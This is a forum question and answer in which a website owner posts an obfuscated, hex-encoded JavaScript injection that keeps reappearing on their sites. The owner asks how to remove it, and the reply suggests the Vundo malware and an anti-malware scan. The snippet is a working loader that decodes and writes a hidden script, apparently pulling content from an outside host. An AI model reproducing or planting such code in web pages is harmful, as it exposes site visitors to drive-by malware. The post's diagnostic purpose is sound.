I have problem with some JS "virus" on all of my websites. They're on different hostings, and on some one of them appears this code.
<script>
function c2670903e0i49d9f1a845f6b(i49d9f1a846377) {
var i49d9f1a846737 = 16;
return (parseInt(i49d9f1a846377, i49d9f1a846737));
}
function i49d9f1a8472f3(i49d9f1a8476d9) {
var i49d9f1a848679 = 2;
var i49d9f1a847da9 = '';
i49d9f1a848e47 = String.fromCharCode;
for (i49d9f1a84828e = 0; i49d9f1a84828e < i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) {
i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e, i49d9f1a848679))));
}
return i49d9f1a847da9;
}
var r1a = '';
var i49d9f1a84922e = '3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + '39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E';
document.write(i49d9f1a8472f3(i49d9f1a84922e));
</script>
NOD32 blocks the website because he believes there is a virus. Deleting the code from sources doesn't help, because it reappears again. It can't be result of XSS, because it appears even on static websites.
I've tried to make full scan of my system and it didn't help. The only thing that is on all websites is Google Analytics, which I think couldn't cause this.
edit: You can see it for example at http://www.postuj.cz/test/ or at http://flavicius.php5.cz/.
Answer
It looks like Vundo or a variant of it. That piece of malware has a tendency to insert seemingly meaningless javascript into sites (on your end, not the server-side). I'd suggest trying Malwarebytes' Anti-Malware. Install it, update it, and do a full scan. If that fails, perhaps try researching options for removing Vundo specifically.